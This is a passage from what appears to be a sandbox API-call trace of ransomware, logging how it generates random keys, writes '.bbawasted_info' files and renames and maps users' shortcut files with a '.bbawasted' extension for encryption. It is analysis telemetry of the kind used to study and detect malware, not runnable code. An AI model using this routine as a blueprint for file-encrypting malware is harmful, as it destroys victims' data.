| out: pbBuffer=0xf9fb48) returned 1 [0072.722] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.731] SetEndOfFile (hFile=0x120) returned 1 [0072.733] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.733] CloseHandle (hObject=0x120) returned 1 [0072.734] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.734] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8290 | out: hHeap=0x580000) returned 1 [0072.735] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.735] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.735] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0072.735] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b2) returned 0x5bf070 [0072.735] lstrcpyW (in: lpString1=0x5bf118, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.735] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0072.735] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.736] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0072.736] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.737] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.738] SetEndOfFile (hFile=0x120) returned 1 [0072.738] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.738] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.738] lstrcpyW (in: lpString1=0x5bf118, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.bbawasted")) returned 1 [0072.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.739] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.739] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.739] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.740] CloseHandle (hObject=0x11c) returned 1 [0072.741] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.742] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.742] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.742] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.743] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.743] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.752] SetEndOfFile (hFile=0x120) returned 1 [0072.754] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.754] CloseHandle (hObject=0x120) returned 1 [0072.755] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.755] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8398 | out: hHeap=0x580000) returned 1 [0072.755] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.756] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.756] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.756] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0072.756] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ae) returned 0x5bf070 [0072.756] lstrcpyW (in: lpString1=0x5bf114, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.756] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0072.756] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.757] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0072.757] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.758] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.758] SetEndOfFile (hFile=0x120) returned 1 [0072.759] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.759] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.759] lstrcpyW (in: lpString1=0x5bf114, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.bbawasted")) returned 1 [0072.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.763] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.763] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x86 [0072.763] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x86) returned 0x570000 [0072.763] CloseHandle (hObject=0x110) returned 1 [0072.765] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.765] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.765] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.765] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.766] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.766] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.775] SetEndOfFile (hFile=0x120) returned 1 [0072.777] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0072.777] CloseHandle (hObject=0x120) returned 1 [0072.780] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.780] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c1050 | out: hHeap=0x580000) returned 1 [0072.780] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.781] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.781] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.781] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0072.781] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x296) returned 0x5bf070 [0072.781] lstrcpyW (in: lpString1=0x5bf0fc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.781] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0072.781] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.781] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0072.782] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.783] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.783] SetEndOfFile (hFile=0x120) returned 1 [0072.784] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.784] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0072.784] lstrcpyW (in: lpString1=0x5bf0fc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.bbawasted")) returned 1 [0072.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.785] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.785] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.785] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.785] CloseHandle (hObject=0x11c) returned 1 [0072.787] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.787] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.787] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.787] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.788] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.788] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.796] SetEndOfFile (hFile=0x120) returned 1 [0072.798] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0072.799] CloseHandle (hObject=0x120) returned 1 [0072.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.800] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb5f0 | out: hHeap=0x580000) returned 1 [0072.800] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.801] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.801] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0072.801] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a6) returned 0x5bf070 [0072.801] lstrcpyW (in: lpString1=0x5bf10c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.801] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0072.801] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.802] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0072.802] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.802] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.803] SetEndOfFile (hFile=0x120) returned 1 [0072.803] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.804] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0072.804] lstrcpyW (in: lpString1=0x5bf10c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.bbawasted")) returned 1 [0072.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.846] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.846] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.846] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.846] CloseHandle (hObject=0x11c) returned 1 [0072.848] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.849] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.849] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.849] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.850] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.850] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.858] SetEndOfFile (hFile=0x120) returned 1 [0072.860] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0072.860] CloseHandle (hObject=0x120) returned 1 [0072.863] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.863] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cc810 | out: hHeap=0x580000) returned 1 [0072.863] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.864] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.864] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0072.864] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x298) returned 0x5bf070 [0072.864] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.864] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0072.864] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.865] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0072.865] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.866] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.867] SetEndOfFile (hFile=0x120) returned 1 [0072.867] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.867] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0072.867] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.bbawasted")) returned 1 [0072.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.869] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.869] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.869] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.869] CloseHandle (hObject=0x110) returned 1 [0072.871] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.872] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.872] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.872] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.873] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.873] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.881] SetEndOfFile (hFile=0x120) returned 1 [0072.883] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0072.883] CloseHandle (hObject=0x120) returned 1 [0072.884] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.885] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb7c0 | out: hHeap=0x580000) returned 1 [0072.885] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.964] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.964] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.964] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0072.964] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5bf070 [0072.964] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted_info" | out: 